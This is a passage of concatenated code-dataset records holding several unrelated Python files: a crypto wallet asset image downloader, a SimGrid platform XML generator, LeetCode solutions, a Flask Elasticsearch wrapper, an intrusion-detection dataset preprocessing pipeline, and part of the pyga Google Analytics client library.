'\\n')\r\nf.close()","repo_name":"msaidzengin/turkish-sentiment-analysis","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"32253489656","text":"import requests\nimport json\nimport convertapi\nimport os\nimport argparse\n\nconvertapi.api_secret = os.environ.get('CONVERTAPI_API_SECRET')\nprint(f'Convert API Secret: {convertapi.api_secret}')\n\ndef get_wallet_assets(address):\n print(f'Fetching Wallet Assets for {address} - step 0')\n url = f'https://xchain.io/api/balances/{address}'\n response = requests.get(url)\n if response.status_code == 200:\n balance_info = response.json()\n all_wallet_assets = []\n print(f'Fetching Wallet Assets for {address}')\n\n for balance in balance_info['data']:\n asset = {\n 'asset': balance['asset'],\n 'quantity': balance['quantity'],\n 'asset_longname': balance['asset_longname'],\n 'description': balance['description'],\n }\n all_wallet_assets.append(asset)\n return all_wallet_assets\n else:\n print(f'Error: {response.status_code} - {response.reason}')\n\ndef get_asset_owner(asset): \n url = f'https://xchain.io/api/asset/{asset}'\n response = requests.get(url)\n asset_description = {}\n\n if response.status_code == 200:\n asset_info = response.json()\n asset_description = {\n 'asset': asset_info[\"asset\"],\n 'description': asset_info[\"description\"],\n 'owner': asset_info[\"owner\"]\n }\n return(asset_description)\n else:\n print(f'Error: {response.status_code} - {response.reason}') \n\ndef get_description_urls(check_address):\n # This fetches the description JSON and parses out the image_url field\n all_wallet_assets = get_wallet_assets(check_address)\n output = []\n print(f'Check if Wallet Owner is Owner of Asset')\n for asset_name in all_wallet_assets:\n asset = asset_name['asset']\n assets_owned_descriptions = get_asset_owner(asset)\n\n if assets_owned_descriptions['owner'] == check_address:\n if assets_owned_descriptions['description'].lower().endswith('.json'):\n description_url = assets_owned_descriptions['description']\n response = requests.get(description_url)\n if response.status_code == 200:\n description_info = response.json()\n image_url = description_info['image_large']\n asset_desc_img_url = {\n \"asset\": asset,\n \"description_url\": description_url,\n \"image_url\": image_url\n }\n output.append(asset_desc_img_url)\n print(json.dumps(asset_desc_img_url))\n # print('\\n')\n else:\n print(f'Error: {response.status_code} - {response.reason}')\n # Save the output to a JSON file\n with open('asset_desc_img_url.json', 'w') as outfile:\n json.dump(asset_desc_img_url, outfile)\n return output\n\ndef save_images(asset_desc_img_urls):\n if not os.path.exists('images'):\n os.mkdir('images')\n for asset_desc_img_url in asset_desc_img_urls:\n # separate the asset value and image_url value\n asset = asset_desc_img_url['asset']\n image_url = asset_desc_img_url['image_url']\n image_filename = image_url.rsplit('/', 1)[1]\n full_filename = asset + '-' + image_filename\n with open('images/' + full_filename, 'wb') as f:\n f.write(requests.get(image_url).content)\n files = os.listdir('images')\n\n for file in files:\n # get the full filename\n print(f'Processing: {file}')\n full_filename = os.path.join('images', file)\n\n # get the file extension from the filename\n file_extension = file.rsplit('.', 1)[1]\n\n # convert the file to webp\n convertapi.convert('webp', {'File': full_filename}, 
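# ---------------------------------------------------------------------------
# Editor's aside (not part of this record): the word-frequency code in the
# split.py record above builds a Counter and then sorts the (word, count)
# pairs itself; Counter can also rank by frequency directly. The token list
# below is a placeholder, for illustration only:
from collections import Counter

wordlist = ['iyi', 'iyi', 'guzel']                  # placeholder tokens
by_word = dict(sorted(Counter(wordlist).items()))   # what split.py computes
by_freq = Counter(wordlist).most_common()           # [('iyi', 2), ('guzel', 1)]
# ---------------------------------------------------------------------------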
from_format=file_extension).save_files('images')\n\ndef main():\n # Define parser and add arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-w', '--wallet', help='The wallet address to check')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Assign arguments to variables\n check_address = args.wallet\n\n # check_address = '1AwS3wRFNCoymKs69BXjAA4VfgWvuKvx4j'\n print(f'Checking address: {check_address} for assets')\n asset_desc_img_urls = get_description_urls(check_address)\n print(f'Preparing for image download and conversion')\n # print(json.dumps(asset_desc_img_urls, indent=4))\n save_images(asset_desc_img_urls)\n\nif __name__ == '__main__':\n main()","repo_name":"hydren-crypto/xcp","sub_path":"xcp_functions.py","file_name":"xcp_functions.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25475647245","text":"import csv, sys, os, datetime\nimport xml.etree.ElementTree as xml\nimport xml.dom.minidom as xmldom\n\ndef main():\n if len(sys.argv) != 3:\n print(\"python3 \" + str(sys.argv[0]) + \" \") \n exit(0)\n\n width = int(sys.argv[1])\n depth = int(sys.argv[2])\n\n platform = xml.Element(\"platform\")\n platform.set('version', '4.1')\n\n AS = xml.SubElement(platform, 'AS')\n AS.set('id', 'AS0')\n AS.set('routing', 'Full')\n\n for i in range(depth):\n if i == depth - 1:\n rad = \"0-1\"\n else:\n rad = \"0-\" + str(width - 1)\n\n ida = \"Coupled-\" + str(i)\n prefix = \"cp-\" + str(i) + \"-\"\n\n coupled = xml.SubElement(AS, 'cluster')\n coupled.set('id', ida)\n coupled.set('prefix', prefix)\n coupled.set('suffix', \"\")\n coupled.set('radical', rad)\n coupled.set('speed', '1e9f')\n coupled.set('bw', '1Gbps')\n coupled.set('lat', '0')\n coupled.set('router_id','RCoupled' + str(i))\n\n gen = xml.SubElement(AS, 'cluster')\n gen.set('id', 'Generator0')\n gen.set('prefix', 'gen-')\n gen.set('suffix', '')\n gen.set('radical', '0-1')\n gen.set('speed', '1e9f')\n gen.set('bw', '1Gbps')\n gen.set('lat', '0')\n gen.set('router_id','RGenerator0')\n\n fin = xml.SubElement(AS, 'cluster')\n fin.set('id', 'Finisher0')\n fin.set('prefix', 'fin-')\n fin.set('suffix', '')\n fin.set('radical', '0-1')\n fin.set('speed', '1e9f')\n fin.set('bw', '1Gbps')\n fin.set('lat', '0')\n fin.set('router_id','RFinisher0')\n\n link = xml.SubElement(AS, 'link')\n link.set('id', 'linkGen0Coupled0')\n link.set('latency', '0')\n link.set('bandwidth', '1Gbps')\n\n for i in range(depth):\n link = xml.SubElement(AS, 'link')\n idl = \"linkCoupled\" + str(i) + \"Fin0\"\n link.set('id', idl)\n link.set('latency', '0')\n link.set('bandwidth', '1Gbps')\n\n for i in range(depth - 1):\n link = xml.SubElement(AS, 'link')\n idl = \"linkCoupled\" + str(i) + \"Coupled\" + str(i+1)\n link.set('id', idl)\n link.set('latency', '0')\n link.set('bandwidth', '1Gbps')\n \n ASroute = xml.SubElement(AS, 'ASroute')\n ASroute.set('src', 'Generator0')\n ASroute.set('dst', 'Coupled-0')\n ASroute.set('gw_src', 'RGenerator0')\n ASroute.set('gw_dst', \"RCoupled0\")\n\n link_ctn = xml.SubElement(ASroute, 'link_ctn')\n link_ctn.set('id', \"linkGen0Coupled0\")\n\n for i in range(depth):\n ASroute = xml.SubElement(AS, 'ASroute')\n ASroute.set('src', \"Coupled-\" + str(i))\n ASroute.set('dst', 'Finisher0')\n ASroute.set('gw_src', \"RCoupled\" + str(i))\n ASroute.set('gw_dst', 'RFinisher0')\n\n link_ctn = xml.SubElement(ASroute, 'link_ctn')\n link_ctn.set('id', \"linkCoupled\" + str(i) + \"Fin0\")\n\n for i in range(depth - 1):\n 
ASroute = xml.SubElement(AS, 'ASroute')\n ASroute.set('src', \"Coupled-\" + str(i))\n ASroute.set('dst', \"Coupled-\" + str(i+1))\n ASroute.set('gw_src', \"RCoupled\" + str(i))\n ASroute.set('gw_dst', \"RCoupled\" + str(i+1))\n\n link_ctn = xml.SubElement(ASroute, 'link_ctn')\n link_ctn.set('id', \"linkCoupled\" + str(i) + \"Coupled\" + str(i+1))\n\n tree = xml.ElementTree(platform)\n\n with open(\"platform.xml\", \"wb\") as fh:\n # NOTE: the original string literal was lost during text extraction;\n # a minimal XML declaration is assumed here.\n fh.write('<?xml version=\"1.0\"?>'.encode('utf-8'))\n\n with open(\"platform.xml\", \"ab\") as fh:\n tree.write(fh, encoding='utf-8')\n\n dom = xmldom.parse(\"platform.xml\")\n string = dom.toprettyxml()\n\n f = open(\"platform.xml\", \"w\")\n # Drop the declaration that minidom's toprettyxml() prepends (the literal\n # below was also stripped in extraction and is reconstructed).\n string = string.replace('<?xml version=\"1.0\" ?>','')\n f.write(string)\n f.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"edelpozop/SimGrid-DEVS","sub_path":"HO/Previous Versions/v2/xml_cre2.py","file_name":"xml_cre2.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23375537343","text":"from typing import *\n\n\n# 315. Count of Smaller Numbers After Self\n# 8000ms\nclass Solution:\n def countSmaller(self, nums: List[int]) -> List[int]:\n log = []\n out = []\n\n for i in range(len(nums) - 1, -1, -1):\n left = 0\n right = len(log) - 1\n\n while left <= right:\n mid = (left + right) // 2\n\n if nums[i] <= log[mid]:\n left = mid + 1\n else:\n right = mid - 1\n out.insert(0, len(log) - left)\n log.insert(left, nums[i])\n\n return out\n\n# 315. Count of Smaller Numbers After Self\n# 1700ms\ndef lowbit(x):\n return x&(-x)\n\nclass Solution:\n def countSmaller(self, nums: List[int]) -> List[int]:\n move=10**4+1\n out=[]\n self.mem=[0]*(2*move)\n self.n=2*move-1\n for i in range(len(nums)-1,-1,-1):\n out.append(self.query(nums[i]+move-1))\n self.add(nums[i]+move)\n return out[::-1]\n\n def add(self,x):\n while x<=self.n:\n self.mem[x]+=1\n x+=lowbit(x)\n\n def query(self,x):\n out=0\n while x>0:\n out+=self.mem[x]\n x-=lowbit(x)\n return out\n\nnums = [5, 2, 6, 1]\nnums = [1,1,1, 1]\nsl = Solution()\nprint(sl.countSmaller(nums))\n","repo_name":"zzz136454872/leetcode","sub_path":"countSmaller.py","file_name":"countSmaller.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"16885939296","text":"import os\n\nfrom flask import current_app\n\nfrom elasticutils import S\n\n\nclass ElasticUtils(object):\n \"\"\"\n A thin wrapper around elasticutils\n \"\"\"\n def __init__(self, app=None):\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n app.config.setdefault('ELASTICSEARCH_URL',\n os.environ.get('ELASTICSEARCH_URL', 'localhost:9200'))\n\n if not hasattr(app, 'extensions'):\n app.extensions = {}\n\n app.extensions['elasticutils'] = S().es(urls=[app.config['ELASTICSEARCH_URL']])\n\n def __getattr__(self, item):\n if not 'elasticutils' in current_app.extensions.keys():\n raise Exception('not initialised, did you forget to call init_app?')\n return getattr(current_app.extensions['elasticutils'], item)\n","repo_name":"neilalbrock/flask-elasticutils","sub_path":"flask_elasticutils.py","file_name":"flask_elasticutils.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"14844775311","text":"from typing import List, Tuple, Optional\nimport os\nimport pandas as pd\nimport numpy as np\nimport yaml\n\nfrom scipy.io import loadmat\nfrom sklearn.pipeline import Pipeline\nfrom 
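# ---------------------------------------------------------------------------
# Editor's aside (not part of this record): a tiny self-check of the Fenwick
# (binary indexed) tree idea behind lowbit()/add()/query() in the 1700 ms
# countSmaller solution above. add(x) registers a value; query(x) counts how
# many registered values are <= x. All names here are illustrative only.
def lowbit(x):
    return x & (-x)

class Fenwick:
    def __init__(self, n):
        self.n = n
        self.mem = [0] * (n + 1)

    def add(self, x):          # register value x (1-based)
        while x <= self.n:
            self.mem[x] += 1
            x += lowbit(x)

    def query(self, x):        # how many registered values are <= x
        total = 0
        while x > 0:
            total += self.mem[x]
            x -= lowbit(x)
        return total

fw = Fenwick(10)
for v in (5, 2, 6):
    fw.add(v)
assert fw.query(4) == 1        # only 2 is <= 4
assert fw.query(6) == 3
# ---------------------------------------------------------------------------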
data.preprocessing import BinaryEncoder, CleanUnique, CleanNegative, CopyLabels, ReplaceNaN, CleanNaN\n\n\nclass BasePipeline:\n\n def __init__(self, path: str, output_path: str, output_name: str, drop_cols: List[int] = None):\n self.path = path\n self.drop_cols = drop_cols or []\n self.output_path = output_path\n self.output_name = output_name if output_name.endswith(\".npz\") else output_name + \".npz\"\n\n def load_data(self) -> Tuple[pd.DataFrame, pd.DataFrame]:\n pass\n\n def setup_pipeline(self) -> Pipeline:\n pass\n\n def preprocess_labels(self, y: pd.DataFrame, dropped_indexes: List[int]) -> Tuple[np.ndarray, Optional[np.ndarray]]:\n y = y.drop(dropped_indexes, axis=0)\n return y.astype(np.int8).to_numpy(), None\n\n def process(self):\n summary = {}\n # Load data and labels\n df, y = self.load_data()\n summary[\"initial_n_instances\"] = df.shape[0]\n summary[\"initial_in_features\"] = df.shape[1]\n # Apply preprocessing on data\n data_pipeline = self.setup_pipeline()\n df = data_pipeline.fit_transform(df, y)\n # Fetch dropped indexes and steps summaries for the report\n dropped_indexes = set()\n for step_name, step in data_pipeline.steps:\n if hasattr(step, \"summary\"):\n summary[step_name] = step.summary\n if hasattr(step, \"dropped_rows\"):\n dropped_indexes = dropped_indexes | set(step.dropped_rows)\n summary[\"final_n_instances\"] = df.shape[0]\n summary[\"final_in_features\"] = df.shape[1]\n # Save changes summary in file\n info_fname = os.path.join(self.output_path, self.output_name.split(\".\")[0] + \"_info.yaml\")\n with open(info_fname, \"w\") as f:\n f.write(\n yaml.dump(summary, default_flow_style=False)\n )\n y, labels = self.preprocess_labels(y, dropped_indexes)\n\n # Save data\n np.savez(\n os.path.join(self.output_path, self.output_name),\n X=df.to_numpy(),\n y=y,\n labels=labels if labels is not None else []\n )\n # df.to_csv(\n # os.path.join(self.output_path, self.output_name)\n # )\n\n\nclass IDSPipeline(BasePipeline):\n\n def uniformize_labels(self, df: pd.DataFrame) -> pd.DataFrame:\n # Group DoS attacks\n mask = df[\"Label\"].str.startswith(\"DoS\")\n df.loc[mask, \"Label\"] = \"DoS\"\n # Group Web attacks\n mask = df[\"Label\"].str.startswith(\"Web Attack\")\n df.loc[mask, \"Label\"] = \"Web Attack\"\n # Rename attacks to match the labels of IDS2018\n # Rename BENIGN to Benign\n mask = df[\"Label\"].str.match(\"BENIGN\")\n df.loc[mask, \"Label\"] = \"Benign\"\n # Rename FTP-Patator to FTP-BruteForce\n mask = df[\"Label\"].str.match(\"FTP-Patator\")\n df.loc[mask, \"Label\"] = \"FTP-BruteForce\"\n # Rename SSH-Patator to SSH-Bruteforce\n mask = df[\"Label\"].str.match(\"SSH-Patator\")\n df.loc[mask, \"Label\"] = \"SSH-Bruteforce\"\n return df\n\n def setup_pipeline(self) -> Pipeline:\n data_pipeline = Pipeline(\n steps=[\n (\"Clean Unique\", CleanUnique()),\n (\"NaN Imputer\", ReplaceNaN(missing_values=np.nan, fill_value=0)),\n (\"Negative Imputer\", CleanNegative(atol=0.01, normal_label=\"Benign\")),\n (\"Copy Labels\", CopyLabels(to_col=\"Category\")),\n ]\n )\n return data_pipeline\n\n def preprocess_labels(self, y: pd.DataFrame, dropped_indexes: List[int]) -> Tuple[np.ndarray, np.ndarray]:\n # Remove dropped indexes\n y = y.drop(list(dropped_indexes), axis=0)\n # Copy labels\n labels = y.copy()\n # Encode binary labels\n enc = BinaryEncoder(normal_label=\"Benign\")\n y = enc.fit_transform(y)\n return y.astype(np.int8).to_numpy(), labels.to_numpy()\n\n def load_data(self):\n df = pd.DataFrame()\n if os.path.isdir(self.path):\n for f in 
os.listdir(self.path):\n if f.endswith(\".csv\"):\n path_to_csv = os.path.join(self.path, f)\n print(f\"processing {path_to_csv} ...\")\n chunk = pd.read_csv(path_to_csv)\n chunk.columns = chunk.columns.str.strip()\n chunk = chunk.drop(self.drop_cols, axis=1, errors=\"ignore\")\n df = pd.concat((df, chunk))\n else:\n print(f\"skipping file {f}\")\n df.to_csv(\n os.path.join(self.output_path, \"merged.csv\"), index=False\n )\n else:\n df = pd.read_csv(self.path)\n df = df.drop(self.drop_cols, axis=1, errors=\"ignore\")\n df = self.uniformize_labels(df)\n return df.drop(\"Label\", axis=1), df.loc[:, \"Label\"]\n\n\nclass MATPipeline(BasePipeline):\n\n def load_data(self):\n mat = loadmat(self.path)\n X = mat['X'] # variable in mat file\n y = mat['y']\n # now make a data frame, setting the time stamps as the index\n return pd.DataFrame(X), pd.DataFrame(y)\n \n def setup_pipeline(self) -> Pipeline:\n pipeline = Pipeline(\n steps=[\n (\"Clean Unique\", CleanUnique()),\n (\"Clean NaN\", CleanNaN(atol=0.01, normal_label=0)),\n (\"Clean Negative\", CleanNegative(atol=0.01, normal_label=0)),\n ],\n )\n return pipeline\n","repo_name":"crakreydiak/pyad","sub_path":"data/preprocessing/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"236399498","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# comment_magics: true\n# split_at_heading: true\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.9.1\n# kernelspec:\n# display_name: Python 3.8.2 64-bit\n# metadata:\n# interpreter:\n# hash: 20bf69066c0dd38d51965b69d5e1b6e387082e3198ba56e97997ac55f4e50ad0\n# name: python3\n# ---\n\nimport pandas as pd\nimport tabula\nimport zipfile\nimport io\nimport math\n\npd.options.display.max_colwidth = 1000\npd.options.display.max_rows = None\nfilename = \"Padrao_TISS_Componente_Organizacional__202012.pdf\"\n\n# # Table 30\n\n# +\npage = 79\ntop = 132.87\nleft = 134.41\nbottom = top + 83.1\nright = left + 212.2\ncol_boundary = 201.75\n\ndf = tabula.read_pdf(filename,\n pages=page,\n guess=False,\n area=[top, left, bottom, right],\n columns=[col_boundary])[0]\ndf\n# -\n\ndf.to_csv('table-30.csv', index=False)\n\n# # Table 32\n\n# +\npage = 85\ntop = 147.08\nleft = 136.12\nbottom = top + 54.73\nright = left + 177.02\ncol_boundary = 169.6\n\ndf = tabula.read_pdf(filename,\n pages=page,\n guess=False,\n area=[top, left, bottom, right],\n columns=[col_boundary])[0]\ndf\n# -\n\ndf.to_csv('table-32.csv', index=False)\n\n# # Table 31\n\nfirst_page = 79\nlast_page = 84 + 1 # need to add 1 since end index is exclusive\npages = list(range(first_page, last_page))\ndfs = tabula.read_pdf(filename, pages=pages)[1:]\n\ndfs[0]\n\n# Fix the first dataframe (which contains the header)\ndf = dfs[0]\nheaders = df.iloc[0]\ndfs[0] = pd.DataFrame(df.values[1:], columns=headers)\ndfs[0]\n\n\n# +\n# Set the headers in the remaining dataframes\n\ndef set_headers(df, headers):\n new_df = pd.read_csv(io.StringIO(df.to_csv(index=False)), header=None)\n return pd.DataFrame(new_df.values, columns=headers)\n\nfor i in range(1, len(dfs)):\n dfs[i] = set_headers(dfs[i], headers)\n# -\n\ndf = pd.concat(dfs, ignore_index=True)\n\ndf.columns\n\ndf\n\n# +\n'''\nTabula does not deal well with entries that take up more\nthan one line in the PDF.\nWe need to scan the df in order to find these entries\nand fix them up.\n'''\n\ndef fix_entries(df):\n 
new_df = pd.DataFrame(columns=df.columns)\n i = 1\n while i < df.shape[0]:\n row = df.iloc[i-1].copy()\n x = df.iloc[i]['Descrição da categoria']\n if isinstance(x, float) and math.isnan(x):\n suffix = df.iloc[i]['Código']\n row['Descrição da categoria'] += ' {}'.format(suffix)\n i += 1\n new_df = new_df.append(row, ignore_index=True)\n i += 1\n \n row = df.iloc[df.shape[0]-1].copy() # copy last row\n new_df = new_df.append(row, ignore_index=True)\n return new_df\n\nnew_df = fix_entries(df)\n# -\n\nnew_df\n\n# We can now export to CSV\nnew_df.to_csv('table-31.csv', index=False)\n\n# # Zipping files\n#\n\nfiles = ['table-30.csv', 'table-31.csv', 'table-32.csv']\nzip_filename = 'Teste_Intuitive_Care_breno_fatureto.zip'\nziph = zipfile.ZipFile(zip_filename, 'w')\nfor file in files:\n ziph.write(file)\nziph.close()\n","repo_name":"brenoafb/intuitive-care","sub_path":"scripts/test2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10570209407","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport calendar\nfrom math import floor\nfrom pyga.entities import Campaign, CustomVariable, Event, Item, Page, Session, SocialInteraction, Transaction, Visitor\nimport pyga.utils as utils\nimport urllib\nimport urllib2\n\n__author__ = \"Arun KR (kra3) \"\n__license__ = \"Simplified BSD\"\n__version__ = '2.5.0'\n\nlogger = logging.getLogger(__name__)\n\n\nclass Q(object):\n REQ_ARRAY = []\n\n def add_wrapped_request(self, req_wrapper):\n self.REQ_ARRAY.append(req_wrapper)\n\n\nclass GIFRequest(object):\n '''\n\n Properties:\n type -- Indicates the type of request, will be mapped to \"utmt\" parameter\n config -- base.Config object\n x_forwarded_for --\n user_agent -- User Agent String\n\n '''\n def __init__(self, config):\n self.type = None\n self.config = None\n self.x_forwarded_for = None\n self.user_agent = None\n self.__Q = Q()\n if isinstance(config, Config):\n self.config = config\n\n def build_http_request(self):\n params = self.build_parameters()\n query_string = urllib.urlencode(params.get_parameters())\n query_string = query_string.replace('+', '%20')\n\n # Mimic Javascript's encodeURIComponent() encoding for the query\n # string just to be sure we are 100% consistent with GA's Javascript client\n query_string = utils.convert_to_uri_component_encoding(query_string)\n\n # Recent versions of ga.js use HTTP POST requests if the query string is too long\n use_post = len(query_string) > 2036\n\n if not use_post:\n url = '%s?%s' % (self.config.endpoint, query_string)\n post = None\n else:\n url = self.config.endpoint\n post = query_string\n\n headers = {}\n headers['Host'] = self.config.endpoint.split('/')[2]\n headers['User-Agent'] = self.user_agent\n headers['X-Forwarded-For'] = self.x_forwarded_for and self.x_forwarded_for or ''\n\n if use_post:\n # Don't ask me why \"text/plain\", but ga.js says so :)\n headers['Content-Type'] = 'text/plain'\n headers['Content-Length'] = len(query_string)\n\n logger.debug(url)\n if post:\n logger.debug(post)\n return urllib2.Request(url, post, headers)\n\n def build_parameters(self):\n '''Marker implementation'''\n return Parameters()\n\n def __send(self):\n request = self.build_http_request()\n response = None\n\n # Do not actually send the request if endpoint host is set to null\n if self.config.endpoint:\n response = urllib2.urlopen(\n request, timeout=self.config.request_timeout)\n\n return response\n\n def fire(self):\n '''\n Simply 
delegates to send() if config option \"queue_requests\" is disabled\n else enqueues the request into Q object: you should call pyga.shutdowon\n as last statement, to actually send out all queued requests.\n '''\n if self.config.queue_requests:\n # Queuing results. You should call pyga.shutdown as last statement to send out requests.\n self.__Q.add_wrapped_request((lambda: self.__send()))\n else:\n self.__send()\n\n\nclass Request(GIFRequest):\n TYPE_PAGE = None\n TYPE_EVENT = 'event'\n TYPE_TRANSACTION = 'tran'\n TYPE_ITEM = 'item'\n TYPE_SOCIAL = 'social'\n\n '''\n This type of request is deprecated in favor of encoding custom variables\n within the \"utme\" parameter, but we include it here for completeness\n '''\n TYPE_CUSTOMVARIABLE = 'var'\n\n X10_CUSTOMVAR_NAME_PROJECT_ID = 8\n X10_CUSTOMVAR_VALUE_PROJCT_ID = 9\n X10_CUSTOMVAR_SCOPE_PROJECT_ID = 11\n\n def __init__(self, config, tracker, visitor, session):\n super(Request, self).__init__(config)\n self.tracker = tracker\n self.visitor = visitor\n self.session = session\n\n def build_http_request(self):\n self.x_forwarded_for = self.visitor.ip_address\n self.user_agent = self.visitor.user_agent\n\n # Increment session track counter for each request\n self.session.track_count = self.session.track_count + 1\n\n #http://code.google.com/intl/de-DE/apis/analytics/docs/tracking/eventTrackerGuide.html#implementationConsiderations\n if self.session.track_count > 500:\n logger.warning('Google Analytics does not guarantee to process more than 500 requests per session.')\n\n if self.tracker.campaign:\n self.tracker.campaign.response_count = self.tracker.campaign.response_count + 1\n\n return super(Request, self).build_http_request()\n\n def build_parameters(self):\n params = Parameters()\n params.utmac = self.tracker.account_id\n params.utmhn = self.tracker.domain_name\n params.utmt = self.get_type()\n params.utmn = utils.get_32bit_random_num()\n '''\n The \"utmip\" parameter is only relevant if a mobile analytics ID\n (MO-XXXXXX-X) was given\n '''\n params.utmip = self.visitor.ip_address\n params.aip = self.tracker.config.anonimize_ip_address and 1 or None\n if params.aip:\n # If anonimization of ip enabled? 
then!\n params.utmip = utils.anonymize_ip(params.utmip)\n\n params.utmhid = self.session.session_id\n params.utms = self.session.track_count\n params = self.build_visitor_parameters(params)\n params = self.build_custom_variable_parameters(params)\n params = self.build_campaign_parameters(params)\n params = self.build_cookie_parameters(params)\n return params\n\n def build_visitor_parameters(self, params):\n if self.visitor.locale:\n params.utmul = self.visitor.locale.replace('_', '-').lower()\n\n if self.visitor.flash_version:\n params.utmfl = self.visitor.flash_version\n\n if self.visitor.java_enabled:\n params.utje = self.visitor.java_enabled\n\n if self.visitor.screen_colour_depth:\n params.utmsc = '%s-bit' % (self.visitor.screen_colour_depth)\n\n if self.visitor.screen_resolution:\n params.utmsr = self.visitor.screen_resolution\n\n return params\n\n def build_custom_variable_parameters(self, params):\n custom_vars = self.tracker.custom_variables\n\n if custom_vars:\n if len(custom_vars) > 5:\n logger.warning('The sum of all custom variables cannot exceed 5 in any given request.')\n\n x10 = X10()\n x10.clear_key(self.X10_CUSTOMVAR_NAME_PROJECT_ID)\n x10.clear_key(self.X10_CUSTOMVAR_VALUE_PROJCT_ID)\n x10.clear_key(self.X10_CUSTOMVAR_SCOPE_PROJECT_ID)\n\n for cvar in custom_vars.itervalues():\n name = utils.encode_uri_components(cvar.name)\n value = utils.encode_uri_components(cvar.value)\n x10.set_key(\n self.X10_CUSTOMVAR_NAME_PROJECT_ID, cvar.index, name)\n x10.set_key(\n self.X10_CUSTOMVAR_VALUE_PROJCT_ID, cvar.index, value)\n\n if cvar.scope and cvar.scope != CustomVariable.SCOPE_PAGE:\n x10.set_key(self.X10_CUSTOMVAR_SCOPE_PROJECT_ID,\n cvar.index, cvar.scope)\n\n params.utme = '%s%s' % (params.utme, x10.render_url_string())\n\n return params\n\n def build_campaign_parameters(self, params):\n campaign = self.tracker.campaign\n if campaign:\n params._utmz = '%s.%s.%s.%s.' 
% (\n self._generate_domain_hash(),\n calendar.timegm(campaign.creation_time.timetuple()),\n self.visitor.visit_count,\n campaign.response_count,\n )\n\n param_map = {\n 'utmcid': campaign.id,\n 'utmcsr': campaign.source,\n 'utmgclid': campaign.g_click_id,\n 'utmdclid': campaign.d_click_id,\n 'utmccn': campaign.name,\n 'utmcmd': campaign.medium,\n 'utmctr': campaign.term,\n 'utmcct': campaign.content,\n }\n\n for k, v in param_map.iteritems():\n if v:\n # Only spaces and pluses get escaped in gaforflash and ga.js, so we do the same\n params._utmz = '%s%s=%s%s' % (params._utmz, k,\n v.replace('+', '%20').replace(' ', '%20'),\n Campaign.CAMPAIGN_DELIMITER\n )\n\n params._utmz = params._utmz.rstrip(Campaign.CAMPAIGN_DELIMITER)\n\n return params\n\n def build_cookie_parameters(self, params):\n domain_hash = self._generate_domain_hash()\n params._utma = \"%s.%s.%s.%s.%s.%s\" % (\n domain_hash,\n self.visitor.unique_id,\n calendar.timegm(self.visitor.first_visit_time.timetuple()),\n calendar.timegm(self.visitor.previous_visit_time.timetuple()),\n calendar.timegm(self.visitor.current_visit_time.timetuple()),\n self.visitor.visit_count\n )\n params._utmb = '%s.%s.10.%s' % (\n domain_hash,\n self.session.track_count,\n calendar.timegm(self.session.start_time.timetuple()),\n )\n params._utmc = domain_hash\n cookies = []\n cookies.append('__utma=%s;' % params._utma)\n if params._utmz:\n cookies.append('__utmz=%s;' % params._utmz)\n if params._utmv:\n cookies.append('__utmv=%s;' % params._utmv)\n\n params.utmcc = '+'.join(cookies)\n return params\n\n def _generate_domain_hash(self):\n hash_val = 1\n if self.tracker.allow_hash:\n hash_val = utils.generate_hash(self.tracker.domain_name)\n\n return hash_val\n\n\nclass ItemRequest(Request):\n def __init__(self, config, tracker, visitor, session, item):\n super(ItemRequest, self).__init__(config, tracker, visitor, session)\n self.item = item\n\n def get_type(self):\n return ItemRequest.TYPE_ITEM\n\n def build_parameters(self):\n params = super(ItemRequest, self).build_parameters()\n params.utmtid = self.item.order_id\n params.utmipc = self.item.sku\n params.utmipn = self.item.name\n params.utmiva = self.item.variation\n params.utmipr = self.item.price\n params.utmiqt = self.item.quantity\n return params\n\n def build_visitor_parameters(self, parameters):\n '''\n The GA Javascript client doesn't send any visitor information for\n e-commerce requests, so we don't either.\n '''\n return parameters\n\n def build_custom_variable_parameters(self, parameters):\n '''\n The GA Javascript client doesn't send any custom variables for\n e-commerce requests, so we don't either.\n '''\n return parameters\n\n\nclass PageViewRequest(Request):\n X10_SITESPEED_PROJECT_ID = 14\n\n def __init__(self, config, tracker, visitor, session, page):\n super(\n PageViewRequest, self).__init__(config, tracker, visitor, session)\n self.page = page\n\n def get_type(self):\n return PageViewRequest.TYPE_PAGE\n\n def build_parameters(self):\n params = super(PageViewRequest, self).build_parameters()\n params.utmp = self.page.path\n params.utmdt = self.page.title\n\n if self.page.charset:\n params.utmcs = self.page.charset\n\n if self.page.referrer:\n params.utmr = self.page.referrer\n\n if self.page.load_time:\n if params.utmn % 100 < self.config.site_speed_sample_rate:\n x10 = X10()\n x10.clear_key(self.X10_SITESPEED_PROJECT_ID)\n x10.clear_value(self.X10_SITESPEED_PROJECT_ID)\n\n # from ga.js\n key = max(min(floor(self.page.load_time / 100), 5000), 0) * 100\n x10.set_key(\n 
